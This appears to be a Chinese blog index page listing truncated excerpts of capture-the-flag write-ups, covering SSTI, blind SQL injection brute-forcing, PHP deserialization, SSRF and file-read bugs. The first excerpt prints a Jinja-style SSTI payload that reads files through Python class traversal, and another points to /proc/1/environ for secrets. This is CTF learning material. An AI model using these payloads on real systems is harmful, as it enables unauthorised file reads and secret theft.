摘要: ssti payload 点击查看代码 # 读文件 #读取文件类,<type ‘file’> file位置一般为40,直接调用 {{[].__class__.__base__.__subclasses__()[40]('flag').read()}} {{[].__class__.__bases__ 阅读全文
posted @ 2023-04-22 00:35 Dr0se 阅读(16) 评论(0) 推荐(0)
摘要: 感觉不同的题目环境是有问题的,标准方式是Quine https://www.cnblogs.com/zhengna/p/15917521.html 学这篇,但是这题的存password的表不是空表 所以爆破 点击查看代码 import requests,time ascii = "123456789 阅读全文
posted @ 2023-04-21 18:15 Dr0se 阅读(36) 评论(0) 推荐(0)
摘要: 点击查看代码 <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; p 阅读全文
posted @ 2023-04-20 15:43 Dr0se 阅读(78) 评论(0) 推荐(0)
摘要: https://forum.butian.net/share/2183 文章最后一个漏洞,要自己下源码去修改 flag在/proc/1/environ 一般来说如果flag不在确切的文件中,那就有可能在环境变量里面,然后如果不通过getshell的方式去打印env的话 就要去内存里面找,内存里面有几 阅读全文
posted @ 2023-04-19 17:19 Dr0se 阅读(0) 评论(0) 推荐(0)
摘要: 一个java的cms,有机会去学学java的代码审计 https://forum.butian.net/share/2183 这篇文章的第一个 后台设置栏目存在任意文件读取漏洞 阅读全文
posted @ 2023-04-19 16:31 Dr0se 阅读(4) 评论(0) 推荐(0)
摘要: 就一直点就好了 累死 阅读全文
posted @ 2023-04-19 16:11 Dr0se 阅读(6) 评论(0) 推荐(0)
摘要: 点击查看代码 <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'])) { @unserialize($_GET['wish']); } //接收一个wish变量get,反序列化,否则new一个新类叫a,Road_i 阅读全文
posted @ 2023-04-19 15:58 Dr0se 阅读(13) 评论(0) 推荐(0)
摘要: 点击查看代码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname #第一个if if host = 阅读全文
posted @ 2023-04-19 13:42 Dr0se 阅读(3) 评论(0) 推荐(0)
摘要: buu靶机爆破不了,会429,调慢速度我不想等,一般这个时候如果我搞不出,就会直接放弃去看wp 看到是index.php.swp 点击查看代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabc 阅读全文
posted @ 2023-04-19 00:29 Dr0se 阅读(1) 评论(0) 推荐(0)
摘要: 代码审计 点击查看代码 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib impo 阅读全文
posted @ 2023-04-18 19:54 Dr0se 阅读(2) 评论(0) 推荐(0)